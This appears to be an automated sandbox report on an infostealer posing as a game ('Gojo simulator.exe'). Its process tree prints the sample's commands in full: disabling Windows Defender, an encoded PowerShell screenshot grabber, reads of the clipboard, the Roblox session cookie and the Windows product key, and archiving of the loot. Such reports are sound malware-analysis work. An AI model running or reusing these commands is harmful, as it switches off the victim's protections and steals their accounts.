Analysis

  • max time kernel
    104s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/04/2025, 23:27

General

  • Target

    dist/Gojo simulator.exe

  • Size

    7.8MB

  • MD5

    af5dd5e0736e272360fd2808eb1e570b

  • SHA1

    a67924548f53e09ce4d1e4906a0a12e3cd4b1839

  • SHA256

    bf89680b50b1fa2be445ffc674826d3445c98761a4c65a081e4eb5938eab1736

  • SHA512

    02a6f7ad4cf9cb196b9246d2fb9c94a46b9163a71fff31f8b5dee12bd58cd6aa7175ec37d71a1ce8fa320af222af86e4f236ed44b3c29989d58c4a5ffa8aed57

  • SSDEEP

    196608:mW1CHUOXXKApOgj9fZwQRCgiIKpdzjPOan7j2y283TOnOh:YxMUw8wIKppDO9ih

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe
    "C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3580
    • C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe
      "C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4508
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4824
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3688
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOADED', 0, 'Load in game', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOADED', 0, 'Load in game', 48+16);close()"
          4⤵
            PID:4600
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3104
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:6112
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4872
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5504
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2224
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:3268
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5420
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5412
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:772
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5520
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:628
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5644
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:2416
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1212
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3848
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fm0ho14z\fm0ho14z.cmdline"
                5⤵
                  PID:2348
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7494.tmp" "c:\Users\Admin\AppData\Local\Temp\fm0ho14z\CSC9AD0409031EE4128BDC461C4B543CBD.TMP"
                    6⤵
                      PID:3372
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2392
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1808
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5788
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3828
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1732
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:5168
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1864
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:1384
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:5460
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1224
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:928
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4504
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:2852
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2324
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:2200
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:3944
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35802\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\yJRVc.zip" *"
                                    3⤵
                                      PID:5364
                                      • C:\Users\Admin\AppData\Local\Temp\_MEI35802\rar.exe
                                        C:\Users\Admin\AppData\Local\Temp\_MEI35802\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\yJRVc.zip" *
                                        4⤵
                                        • Executes dropped EXE
                                        PID:2212
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                      3⤵
                                        PID:2536
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic os get Caption
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4784
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                        3⤵
                                          PID:5456
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get totalphysicalmemory
                                            4⤵
                                              PID:3540
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                            3⤵
                                              PID:5188
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic csproduct get uuid
                                                4⤵
                                                  PID:1732
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:5972
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5580
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:2316
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      4⤵
                                                      • Detects videocard installed
                                                      PID:2484
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                    3⤵
                                                      PID:5352
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4816

                                                Network

                                                MITRE ATT&CK Enterprise v16

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  3KB

                                                  MD5

                                                  1886780acbc3bf6c6ebc1399eca15e23

                                                  SHA1

                                                  6dfec48a33cebec15aa736fe782958adfa073631

                                                  SHA256

                                                  0c75cbb4fc2c7a4030b2d4bdd445e0d02bd4b5ee840ed25546e6ac22c2884250

                                                  SHA512

                                                  1100acd7753ea6c092c3c4ea340564e8d2d0b35609c82fe4b4f9d77a6848f84f8a8f4e2d67c29d3f104e715f06a1fd5fa9d800980d60f07bcb2643bd3327c01c

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  ba8a00bf6995531451ca4ff43fecb0b9

                                                  SHA1

                                                  b590fcea37aded3a4b083ec2d39252fe10b97a61

                                                  SHA256

                                                  0211a4649daa040751a5aa8f42a3a677da906daf541fed80c2aa19c5f77e9a60

                                                  SHA512

                                                  e0cfd06cca6fca6d1b742ecc354c2dd9c0e72ab456525086c2af388cb533ff5baae6ff83fa4347dfbc28edc1a2c1b97ef986c2923af9634fd6d967e913fbfc4b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  f68785608a60c0961b2926f9c4d4ff87

                                                  SHA1

                                                  e90357d9a679b851acf30e5e7aa6f76f2e6d3bb4

                                                  SHA256

                                                  edeed8daa6363551c6ffe770dc95fc9a767da6a020004c61c8e3d81eccb9d673

                                                  SHA512

                                                  fa369a235b3d4375e7856e39f42b17fb118fadb0b48fbe71074fa47354d0713662b950142ab5083c01cc850f79bbb0abe154eefe0e754b9b76e8d3b330daf652

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  fae5e2423225b1b2724474965d0e7a8c

                                                  SHA1

                                                  ef60afe5df0d329925d15b64625b433b05fb3214

                                                  SHA256

                                                  e68651a318add2f9da8721132249b566aaac4cbf7ef0e5881494c08fea55ed03

                                                  SHA512

                                                  3044ffe8411f61eb00e01cb03070d718fc251a83000e35088618f1dfb1efeda5288a58656c0f296ab54214580ca66699484a74a8e81d70b8ea34da249e1a3b01

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  276798eeb29a49dc6e199768bc9c2e71

